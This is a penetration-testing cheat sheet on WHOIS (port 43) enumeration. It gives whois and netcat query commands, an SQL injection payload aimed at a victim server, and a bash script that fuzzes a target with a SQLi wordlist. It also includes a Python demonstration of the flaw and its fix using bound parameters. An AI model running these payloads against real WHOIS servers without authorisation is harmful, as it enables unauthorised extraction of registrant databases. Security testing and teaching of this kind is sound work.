# WHOIS - Port 43


## Basic Information

WHOIS is a protocol used to query databases for information about the registrants of internet resources, including domain names, IP address blocks, and autonomous systems. It runs over TCP, by default on port 43, and can be a key tool for information gathering during penetration testing.

**Default port:** 43

```text
PORT   STATE  SERVICE
43/tcp open   whois
```

## Enumerating WHOIS

To begin with WHOIS enumeration, you can query a WHOIS server to extract all available information about a domain:

```bash
whois -h <HOST> -p <PORT> "domain.tld"
```

Alternatively, you can also use netcat for the same purpose:

```bash
echo "domain.tld" | nc -vn <HOST> <PORT>
```

## Database Information

Often, the WHOIS server responds with the name of the database being queried, which is useful for further enumeration. WHOIS services store and retrieve their records from a database, so a server that inserts the query string directly into its SQL lookup may be vulnerable to SQL injection.

Using the following query:

```bash
whois -h <Victim_ip> -p 43 "a') or 1=1#"
```

If the WHOIS server is vulnerable, you could extract all the information stored in the underlying database. This makes it essential to consider WHOIS as a potential vector for SQL injection attacks when testing.
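
Why that query string works, and the server-side fix, as an added example that is not from the original page. A constructed two-row SQLite table stands in for the WHOIS backend; the table, column and function names are assumptions, and because SQLite has no `#` comment the vulnerable path emulates MySQL by truncating at `#`.

```python
import re
import sqlite3

PAYLOAD = "a') or 1=1#"  # the query string shown above

def make_db():
    """Constructed two-row table standing in for a WHOIS backend (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE whois (domain TEXT PRIMARY KEY, registrant TEXT)")
    db.executemany("INSERT INTO whois VALUES (?, ?)",
                   [("example.tld", "Alice"), ("internal.tld", "Bob")])
    return db

def vulnerable_sql(query):
    # Flaw: the line read from port 43 is pasted straight into the SQL text.
    return "SELECT domain, registrant FROM whois WHERE (domain = '%s')" % query

def lookup_vulnerable(db, query):
    sql = vulnerable_sql(query)
    # MySQL treats '#' as a comment start; SQLite does not, so the demo
    # emulates that by dropping everything from the first '#'.
    return db.execute(sql.split("#", 1)[0]).fetchall()

# Letters, digits and hyphens per label, dot-separated, alphabetic TLD.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")

def lookup_hardened(db, query):
    query = query.strip().lower()
    if not DOMAIN_RE.match(query):
        return None  # rejected before it reaches the database
    # Bound parameter: the value is never parsed as SQL.
    return db.execute(
        "SELECT domain, registrant FROM whois WHERE domain = ?", (query,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(PAYLOAD))
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("hardened:  ", lookup_hardened(db, PAYLOAD))
    print("hardened:  ", lookup_hardened(db, "example.tld\r\n"))
```

The concatenated statement closes the string and parenthesis early, so the `or 1=1` clause matches every row; the hardened lookup rejects the same input at validation and would treat it as a literal value even if it passed.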

A script to automate the SQLi test:

```bash
#!/bin/bash

# Variables
HOST="10.10.10.10"  # Change to the target IP
PORT="43"            # Default WHOIS port
WORDLIST="/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt"  # Path to your SQLi wordlist

# Check if wordlist exists
if [[ ! -f "$WORDLIST" ]]; then
  echo "Wordlist not found!" >&2
  exit 1
fi

# Loop through each payload in the wordlist
while IFS= read -r payload; do
  # Skip blank lines in the wordlist
  [[ -z "$payload" ]] && continue

  echo "Testing with payload: $payload"

  # Perform the WHOIS request with the current payload
  # (variables are quoted so the shell does not split or glob them)
  response=$(whois -h "$HOST" -p "$PORT" "$payload")

  # Check the response for SQLi indicators (change this according to the specific indicator you want)
  if echo "$response" | grep -qiE "syntax error|unexpected"; then
    echo "Possible SQLi detected with payload: $payload"
    echo "Response: $response"
    echo "-------------------------------------------"
  fi

done < "$WORDLIST"

echo "SQLi test completed."
```

Save the script as `whois-sqli-tester.sh`, make it executable, and run it:

```bash
chmod +x whois-sqli-tester.sh
./whois-sqli-tester.sh
```


